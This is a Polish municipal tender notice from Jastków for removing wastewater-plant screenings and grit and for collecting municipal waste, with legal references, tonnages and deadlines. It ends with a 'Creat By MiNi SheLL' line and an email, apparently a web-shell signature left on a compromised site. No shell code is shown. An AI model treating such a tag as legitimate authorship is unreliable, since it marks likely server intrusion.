<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca będzie zobowiązany do gospodarowania przedmiotowymi odpadami z zachowaniem
wymogów określonych przepisami:
- ustawy z dnia 27.04.2001r. o odpadach (Dz.U. z 2010r. nr 185 poz. 1243) t.j.)
- ustawy z dnia 27.04.2001r. Prawo Ochrony Środowiska (Dz.U. z 2008r. nr 25, poz. 150 tj. z późn.
zm.)
Wybrany w drodze przetargu Wykonawca, posiadający wymagane przepisami prawa zezwolenie na
prowadzenie działalności w zakresie odzysku lub unieszkodliwienia odpadów, zgodnie z art. 25 ust.
3 ustawy o odpadach staje się posiadaczem odpadów z wszelkimi konsekwencjami wynikającymi z
przepisów w/w ustawy w tym zakresie, a w szczególności przejmuje odpowiedzialność za dalsze
postępowanie z odpadami od momentu załadunku odpadów na terenie oczyszczalni ścieków w
Snopkowie lub Tomaszowicach.
Potwierdzenie wykonania usługi wywozu i poddania odzyskowi lub unieszkodliwieniu odpadów
Wykonawca będzie zobowiązany przedłożyć w formie Karty Przekazania Odpadu zgodnie z
Rozporządzeniem Ministra Środowiska z 08.12.2010r. w sprawie wzorów dokumentów
stosowanych na potrzeby ewidencji odpadów (Dz.U. z 2010r. Nr 249, poz. 1673)
Odpady będą gromadzone w 3 pojemnikach :
a) oczyszczalnia ścieków w Snopkowie :
- jeden pojemnik na skratki i jeden na zawartość piaskowników
b) oczyszczalnia ścieków w Tomaszowicach
- jeden pojemnik na skratki,
Szacunkowa ilość kontenerów i pojemników przewidziana do opróżnienia w okresie trwania
zamówienia;
a) oczyszczalnia ścieków w Snopkowie
- zawartość piaskowników - 14 Mg ( 3,5 Mg na kwartał)
- skratki - 8 Mg ( 1,33 Mg co 2 miesiące)
b) oczyszczalnia ścieków w Tomaszowicach
- skratki - 2 Mg ( 0,33 Mg co 2 miesiące)
Wyposażenie nieruchomości w kontenery i pojemnik należy do wykonawcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługa wywozu niesegregowanych odpadów komunalnych -
kod 20 03 01 w rozumieniu art. 3 ust.3 ustawy z dnia 27 kwietnia 2001r. o odpadach (D.U. z
2010r. Nr 185, poz. 1243 ze zm.) pochodzących z budynku Urzędu Gminy Jastków oraz
komunalnej oczyszczalni ścieków w Snopkowie oraz tzw. dzikich wysypisk do instalacji
regionalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce deponowania odpadów - zgodnie z zapisami ustawy z dnia 13 września 1996r. o
utrzymaniu czystości i porządku w gminach ( Dz.U. 2012.391.tj), ustawy z dnia 27 kwietnia 2001r.
o odpadach ( tj.Dz.U. z 2010r. Nr 185, poz. 1243) oraz zapisami Planu Gospodarki Odpadami Dla
Województwa Lubelskiego 2017stanowiącego załącznik do uchwały Nr XXIV/396/2012 Sejmiku
Województwa z dnia 30 lipca 2012r.
Odpady pochodzące z budynku UG Jastków będą gromadzone w kontenerze KP-7 , odpady
pochodzące z tzw. dzikich wysypisk w kontenerze KP-7 podstawianym na dodatkowe zlecenie, z
kolei odpady pochodzące z oczyszczalni ścieków w Snopkowie w pojemniku 120l.
Szacunkowa ilość kontenerów i pojemników przewidziana do opróżnienia w okresie trwania
zamówienia;
- kontener KP-7 przy budynku UG Jastków - ok. 5 szt.
- kontener KP-7 podstawiony na dodatkowe zlecenie - ok.6 szt.
- pojemnik 120 l na terenie oczyszczalni ścieków w Snopkowie - ok. 6 szt.
Wyposażenie nieruchomości w kontenery i pojemnik należy do wykonawcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com